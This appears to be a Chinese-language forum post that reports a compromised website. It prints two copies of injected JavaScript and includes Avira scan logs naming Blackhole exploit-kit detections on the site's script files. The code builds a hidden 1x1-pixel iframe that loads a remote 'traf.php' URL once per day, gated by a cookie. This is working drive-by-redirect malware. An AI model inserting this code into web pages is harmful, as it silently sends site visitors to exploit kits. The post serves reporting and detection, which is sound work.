| 复制代码function zzzfff() {
     var h = document.createElement('iframe');
     h.src = 'http://40650fb6296c68d0.lolipop.jp/traf.php';
     h.style.position = 'absolute';
     h.style.border = '0';
     h.style.height = '1px';
     h.style.width = '1px';
     h.style.left = '1px';
     h.style.top = '1px';
     if (!document.getElementById('h')) {
         document.write('<div id=\'h\'></div>');
         document.getElementById('h').appendChild(h);
     }
 }
 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }
 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) && (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');
         zzzfff();
     }
 }
 复制代码function zzzfff() {
     var pfl = document.createElement('iframe');
     pfl.src = 'http://40650fb6296c68d0.lolipop.jp/traf.php';
     pfl.style.position = 'absolute';
     pfl.style.border = '0';
     pfl.style.height = '1px';
     pfl.style.width = '1px';
     pfl.style.left = '1px';
     pfl.style.top = '1px';
     if (!document.getElementById('pfl')) {
         document.write('<div id=\'pfl\'></div>');
         document.getElementById('pfl').appendChild(pfl);
     }
 }
 function SetCookie(cookieName, cookieValue, nDays, path) {
     var today = new Date();
     var expire = new Date();
     if (nDays == null || nDays == 0) nDays = 1;
     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
     document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
 }
 function GetCookie(name) {
     var start = document.cookie.indexOf(name + "=");
     var len = start + name.length + 1;
     if ((!start) && (name != document.cookie.substring(0, name.length))) {
         return null;
     }
     if (start == -1) return null;
     var end = document.cookie.indexOf(";", len);
     if (end == -1) end = document.cookie.length;
     return unescape(document.cookie.substring(len, end));
 }
 if (navigator.cookieEnabled) {
     if (GetCookie('visited_uq') == 55) {} else {
         SetCookie('visited_uq', '55', '1', '/');
         zzzfff();
     }
 }
 Avira
 
 2013/7/12 上午 05:42 [System Scanner] 發現惡意程式碼檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\UL724GWW\script[3].js'
 包含病毒或有害的程式 'JS/Expack.CM.4' [virus]
 已採取動作:
 檔案會移動至 '5af9b9df.qua' 名稱底下的隔離區目錄。.
 
 2013/7/12 上午 05:42 [System Scanner] 掃描
 掃描結束 [已完成全部的掃描。]。
 檔案數:        814
 目錄數:        0
 惡意程式碼數:        1
 警告數:        0
 
 2013/7/12 上午 05:42 [System Scanner] 發現惡意程式碼
 檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\UL724GWW\caronesrl_it[1].htm'
 包含病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus]
 已採取動作:
 發生錯誤,檔案未刪除。錯誤識別碼:26003.
 檔案無法刪除!.
 嘗試使用 ARK 程式庫執行動作。.
 檔案會移動至 '4d669501.qua' 名稱底下的隔離區目錄。.
 
 2013/7/12 上午 05:42 [System Scanner] 掃描
 掃描結束 [已完成全部的掃描。]。
 檔案數:        798
 目錄數:        0
 惡意程式碼數:        1
 警告數:        0
 
 2013/7/12 上午 05:41 [Real-Time Protection] 發現惡意程式碼
 在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\UL724GWW\script[3].js 中
 偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
 執行的動作:拒絕存取
 
 2013/7/12 上午 05:41 [Web Protection] 發現惡意程式碼
 從 URL "http://caronesrl.it/media/system/js/mootools.js" 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:封鎖的檔案
 
 2013/7/12 上午 05:41 [Web Protection] 發現惡意程式碼
 從 URL "http://caronesrl.it/modules/mod_swmenupro/menu_Packed.js" 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:封鎖的檔案
 
 2013/7/12 上午 05:41 [Web Protection] 發現惡意程式碼
 從 URL "http://caronesrl.it/media/system/js/caption.js" 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:封鎖的檔案
 
 2013/7/12 上午 05:41 [Real-Time Protection] 發現惡意程式碼
 在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\UL724GWW\script[3].js 中
 偵測到病毒或有害的程式 'JS/Expack.CM.4 [virus]'
 執行的動作:傳輸至掃描程式
 
 2013/7/12 上午 05:41 [Web Protection] 發現惡意程式碼
 從 URL "http://caronesrl.it/templates/template_toyota02/script.js" 存取資料時,
 發現病毒或有害的程式 'JS/Expack.CM.4' [virus]。
 已採取動作:已略過
 
 2013/7/12 上午 05:41 [Real-Time Protection] 發現惡意程式碼
 在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
 Files\Low\Content.IE5\UL724GWW\caronesrl_it[1].htm 中
 偵測到病毒或有害的程式 'JS/BlacoleRef.CZ.29 [virus]'
 執行的動作:傳輸至掃描程式
 
 2013/7/12 上午 05:41 [Web Protection] 發現惡意程式碼
 從 URL "http://caronesrl.it/" 存取資料時,
 發現病毒或有害的程式 'JS/BlacoleRef.CZ.29' [virus]。
 已採取動作:已略過
 
   |